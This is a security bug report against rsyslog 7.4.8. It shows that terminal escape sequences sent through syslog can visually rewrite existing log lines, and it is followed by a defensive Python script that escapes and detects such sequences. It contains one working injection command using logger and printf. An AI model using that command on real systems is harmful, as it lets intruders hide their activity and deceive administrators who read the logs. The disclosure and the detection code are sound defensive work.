Package: rsyslog
Version: 7.4.8
Severity: important
Tags: security
Hi,
It seems to me that it is possible to inject terminal escape sequences
into log files via syslog(3):
# tail -f /var/log/messages
Aug 23 13:50:33 ghetto kernel: ACPI Error: Method parse/execution
failed [\_GPE._L10] (Node ffff88017b0e47d0), AE_NOT_FOUND
(20141107/psparse-536)
(*) Aug 23 13:50:33 ghetto kernel: ACPI Exception: AE_NOT_FOUND, while
evaluating GPE method [_L10] (20141107/evgpe-581)
$ logger `printf 'HELLO\n\033[2AAAAAAAAAAAAAA\033[2B'`
# tail -f /var/log/messages
Aug 23 13:50:33 ghetto kernel: ACPI Error: Method parse/execution
failed [\_GPE._L10] (Node ffff88017b0e47d0), AE_NOT_FOUND
(20141107/psparse-536)
(*) Aug 23 13:50:33 ghetto kernel: ACPI AAAAAAAAAAAAA_NOT_FOUND, while
evaluating GPE method [_L10] (20141107/evgpe-581)
Aug 23 13:50:39 ghetto saken: HELLO
On the (*) line, the escape sequence changed its contents, meaning
that an unprivileged user can take advantage of this to hide their
presence on the system by changing legitimate logs, modifying a window's
title, changing background and foreground color, etc.
While researching this, I found that rsyslogd has
"$EscapeControlCharactersOnReceive", which claims that it is on by default
and that "The intent is to provide a way to stop non-printable
messages from entering the syslog system as whole."
On my system, this does not seem to be true, and I actually went ahead
and added "$EscapeControlCharactersOnReceive on" to the
/etc/rsyslog.conf file, restarted rsyslog, and the problem still
persists.
I am using rsyslogd 7.4.8.
Thanks,
Federico Bento.
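As an added illustration (not part of the report and not rsyslog's own code), a small Python check that does the two things a defender wants here: apply the "#ooo" octal conversion that the rsyslog documentation describes for $EscapeControlCharactersOnReceive to incoming text, and scan already-written log lines for CSI sequences such as the cursor move shown above. The sample lines are constructed from the report's output; the hostname and tag are placeholders.

```python
import re

# Constructed sample: a clean kernel line from the report, then a line
# carrying a cursor-up / cursor-down sequence of the kind the report shows.
SAMPLE_LINES = [
    "Aug 23 13:50:33 ghetto kernel: ACPI Exception: AE_NOT_FOUND, "
    "while evaluating GPE method [_L10]",
    "Aug 23 13:50:39 ghetto saken: HELLO\n\x1b[2AAAAAAAAAAAAAA\x1b[2B",
]

def escape_control_chars(msg: str, prefix: str = "#") -> str:
    """Replace every control character (0x00-0x1F, 0x7F) with the prefix
    followed by its 3-digit octal code, the conversion rsyslog documents
    for $EscapeControlCharactersOnReceive (prefix '#' by default)."""
    out = []
    for ch in msg:
        code = ord(ch)
        if code < 0x20 or code == 0x7F:
            out.append(f"{prefix}{code:03o}")   # e.g. ESC -> "#033"
        else:
            out.append(ch)
    return "".join(out)

# ANSI CSI sequence: ESC '[' parameter bytes, intermediate bytes, final byte.
CSI_RE = re.compile(r"\x1b\[[0-?]*[ -/]*[@-~]")
# Any raw control character at all; a sanitized line must contain none.
CTRL_RE = re.compile(r"[\x00-\x1f\x7f]")

def find_escape_injections(lines):
    """Return (line_number, csi_count, has_control_chars) for each line
    that still contains raw control characters or CSI sequences."""
    findings = []
    for n, line in enumerate(lines, 1):
        csi = CSI_RE.findall(line)
        ctrl = CTRL_RE.search(line) is not None
        if csi or ctrl:
            findings.append((n, len(csi), ctrl))
    return findings

if __name__ == "__main__":
    for hit in find_escape_injections(SAMPLE_LINES):
        print("raw log line %d: %d CSI sequences, control chars=%s" % hit)
    for line in SAMPLE_LINES:
        print(escape_control_chars(line))
```

Running the scan over the escaped lines returns nothing, which is the state the report expected the directive to produce.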